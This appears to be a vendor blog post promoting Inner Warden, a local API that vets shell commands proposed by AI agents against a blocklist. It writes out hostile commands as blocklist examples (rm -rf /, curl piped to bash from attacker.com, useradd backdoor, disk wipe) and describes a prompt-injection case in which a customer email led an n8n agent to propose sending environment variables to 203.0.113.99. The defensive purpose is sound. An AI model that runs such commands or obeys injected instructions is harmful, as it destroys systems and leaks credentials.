AI Agent Security

How to Protect AI Agents Running on Your Server

Name: Inner Warden
Author: Inner Warden

March 26, 20268 min read

AI agents are running commands on servers everywhere. n8n workflows execute shell scripts. OpenClaw agents provision infrastructure. Custom LLM agents process data pipelines. They are powerful, productive, and dangerous, because every command an agent runs has the same permissions as the user running the agent.

What happens when an AI agent hallucinates rm -rf /? Or when a prompt injection tricks it into running curl attacker.com/shell.sh | bash? Without a validation layer, the command executes with full privileges. Inner Warden provides that validation layer.

Why AI agents need a safety net

AI agents are non-deterministic by nature. The same prompt can produce different commands on different runs. This is fine for text generation. It is catastrophic for system administration. The risks include:

Hallucinated commands - the model generates a command that looks plausible but is destructive. It "remembers" a path that does not exist or a flag that does something different from what it thinks.
Prompt injection - an attacker embeds instructions in data the agent processes (a filename, a web page, a database field). The agent follows the injected instructions.
Scope creep - the agent is asked to "clean up disk space" and decides to delete log files, backups, or data directories.
Credential exposure - the agent prints environment variables, API keys, or database connection strings in its output or logs.

How the check-command API works

Inner Warden exposes a local API that AI agents call before executing any command. The agent sends the proposed command, Inner Warden scores the risk, and returns an allow/deny decision. The flow:

1. Agent proposes a command

The AI agent sends the command string to Inner Warden's local API endpoint before executing it.

2. Inner Warden analyzes the command

The command is checked against a blocklist (destructive operations), an allowlist (safe operations), and optionally scored by AI for context-aware risk assessment.

3. Decision returned

The API returns: allow (safe to execute), deny (blocked), or review (requires human approval via Telegram).

4. Audit trail

Every command check is logged in the JSONL audit trail: what was proposed, what was decided, and why.

What gets blocked

Inner Warden blocks commands that are destructive, exfiltrative, or escalatory. Examples:

rm -rf /Filesystem destruction

curl ... | bashRemote code execution

chmod 777 /etc/shadowCredential exposure

useradd backdoorUnauthorized user creation

iptables -FFirewall rule flush

dd if=/dev/zero of=/dev/sdaDisk wipe

env | curl ...Credential exfiltration

The blocklist is extensible. You can add custom patterns specific to your environment (e.g., block any command that touches your production database).

Real example

An n8n workflow processing customer data was compromised via prompt injection in a customer email. The injected instructions told the agent to exfiltrate environment variables:

proposeenv | curl -X POST -d @- https://203.0.113.99/collect

denyCommand blocked | pattern: credential exfiltration via curl POST

alertTelegram alert sent | operator notified of prompt injection attempt

Without the check-command API, the environment variables (including database credentials and API keys) would have been sent to the attacker's server. Inner Warden blocked it and alerted the operator.

Set it up

Install Inner Warden and enable the AI agent protection capability:

Install

curl -fsSL https://www.innerwarden.com/install | sudo bash

Enable AI agent protection

innerwarden enable openclaw-protection

The check-command API is available at localhost only. It is not exposed to the network. Point your AI agent's command execution to call this API before running any shell command.

What to do next

AI isolation model - understand the principles behind Inner Warden's approach to AI safety.
Sudo abuse monitoring - if an AI agent has sudo access, monitor for privilege escalation patterns.
AI agents overview - learn about all AI provider integrations and how confidence scoring works.

How to Protect AI Agents Running on Your Server

Why AI agents need a safety net

How the check-command API works

What gets blocked

Real example

Set it up

What to do next

Keep following the attack path

Runtime Guardrails, Not Prompt Guardrails

Inner Warden for AI Startups: Protecting Inference Servers

Building Secure AI Agents: A Practical Guide

What Happens When an AI Agent Gets Hacked

Your AI Agent Has a Bodyguard Now

OpenClaw + Inner Warden: Your AI Agent Gets a Security Armor